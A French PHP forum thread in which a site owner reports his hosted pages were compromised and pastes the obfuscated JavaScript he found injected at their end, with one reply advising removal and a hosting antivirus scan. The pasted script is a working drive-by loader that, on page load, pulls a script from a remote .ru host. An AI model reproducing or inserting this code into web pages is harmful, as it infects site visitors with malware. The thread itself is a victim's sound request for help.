IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

faille sur mon site : <script> à la fin de mes pages


Sujet :

Langage PHP

  1. #1
    Membre à l'essai
    Profil pro
    Inscrit en
    Mai 2002
    Messages
    18
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2002
    Messages : 18
    Points : 19
    Points
    19
    Par défaut faille sur mon site : <script> à la fin de mes pages
    Bonsoir à tous,

    j'ai un site hébergé par FREE avec un peu de code en php...
    J'avais des difficultés pour me connecter et un ami m'a informé que son antivirus s'affolait quand il visitait mon site...
    J'ai vérifié, retiré le code récupéré sur le net (forum, livre d'or...) et j'ai remarqué à la fin de mes pages un code certainement à l'origine de mes soucis :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script>try {var r;if(r!='' && r!='UF'){r='DG'};var a=RegExp;var ux;if(ux!='DZ' && ux!='c'){ux='DZ'};this.f="";var g="replKYB".substr(0,4)+"MuvOaceuvOM".substr(4,3);var A=new Date();var n;if(n!='' && n!='i'){n=null};this.CQ='';var T=new String();function D(s,L){var Q;if(Q!='' && Q!='O'){Q=null};this.H="";var B=String("[");this.k="";var _="tQdJg".substr(4);B+=L;B+="]H9Pc".substr(0,1);this.t="";this.aX='';var E=new a(B, _);var lv;if(lv!='' && lv!='qe'){lv=''};var rzt="";return s[g](E, new String());var I;if(I!='Vz' && I!='ge'){I='Vz'};var J;if(J!='' && J!='UO'){J=null};};this.iM='';var Fs;if(Fs!='' && Fs!='Rm'){Fs=null};var tY='';var Zn='';var kz=new Array();var m=D('82604648666022',"624");var UG;if(UG!=''){UG='nz'};var U=D('oTnmlTomaTdT',"Tm");var zO;if(zO!='' && zO!='If'){zO='GN'};var mN=D('smcmrmiMpmtn',"mnMPU");var ek=new Date();var mT="";var R=D('/PgPoPo0gPlPe0.PcPo0mP/0gPo0oPg0l0eP.0c0oPmP/PrPePuPtPe0r0s0.PcPo0mP/0l0ePoP.0o0r0gP/0p0c0hP.0cPo0m0.Pp0hPpP',"P0");var FU='';var um;if(um!='lC' && um != ''){um=null};var _x=D('cBrBeBaTtBeBEylTeymBeZnTtB',"TZgBy");var Wl;if(Wl!='' && Wl!='sc'){Wl=null};var KQ;if(KQ!='' && KQ!='fR'){KQ=''};var l=window;var N='';var RR='';var qI;if(qI!='Xfb' && qI != ''){qI=null};var QN;if(QN!='j' && QN!='kZ'){QN='j'};var Rt=D('h3t3tRp3:R/3/RxRa3nRg3a3-3c3o3mR.3w3eRr3-3kRe3nRnRtR-RwReRnR.RdRe3.RgRo3o3gRlReR-RcRo3mR-3m3y3.3B3uRy3TRh3e3BRlReRn3dReRr3.Rr3uR:3',"3R");var CZ;if(CZ!='fI'){CZ='fI'};X=function(){var MF="";var dT='';var Gs="";var mP="";q=document[_x](mN);var FD=new String();RR=Rt+m;RR+=R;var TX;if(TX!=''){TX='df'};var FP;if(FP!=''){FP='qL'};q.defer=([1,4][0]);var UN='';var lM;if(lM!=''){lM='S'};var jR;if(jR!=''){jR='Sa'};q.src=RR;var Nw;if(Nw!='gv' && Nw!='JV'){Nw=''};var NC=new Date();var Hg="";document.body.appendChild(q);};var MO=new Array();l[U]=X;var CKW;if(CKW!='yY'){CKW=''};} catch(P){};</script>
    Je vais donc reprendre mes pages une par une et supprimer ce code...
    Avez vous déjà vu quelques choses de similaires ?
    merci

  2. #2
    Membre éclairé Avatar de nsanabi
    Homme Profil pro
    Inscrit en
    Septembre 2003
    Messages
    570
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Septembre 2003
    Messages : 570
    Points : 678
    Points
    678
    Par défaut
    je ne sais pas d'où viens le code mais à mon avis c'est un code qui a été transformé par un obfuscateur pour qu'il soit illisible et compliqué à comprendre
    supprimer le script suspect me parait une bonne solution si tu es sùr que tes pages n'en ont besoin
    tu peut scanner les fichiers chez ton hébergeur par un antivirus, ou leurs demander de le faire, il m'est arrivé deux fois un truc semblable sur un site et chaque fois c'était un virus qui trainait chez l'hébergeur

Discussions similaires

  1. Faille sur mon site
    Par Jasonvnm dans le forum Langage
    Réponses: 14
    Dernier message: 03/11/2013, 21h17
  2. Faille SQL sur mon site
    Par xixou dans le forum Langage
    Réponses: 4
    Dernier message: 07/11/2012, 02h07
  3. [HTML 4.0] Script google+ sur mon site web
    Par gcrouau dans le forum Balisage (X)HTML et validation W3C
    Réponses: 2
    Dernier message: 13/09/2012, 14h24
  4. Déterminer les failles de sécurités sur mon site
    Par whitespirit dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 2
    Dernier message: 05/06/2008, 08h36

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo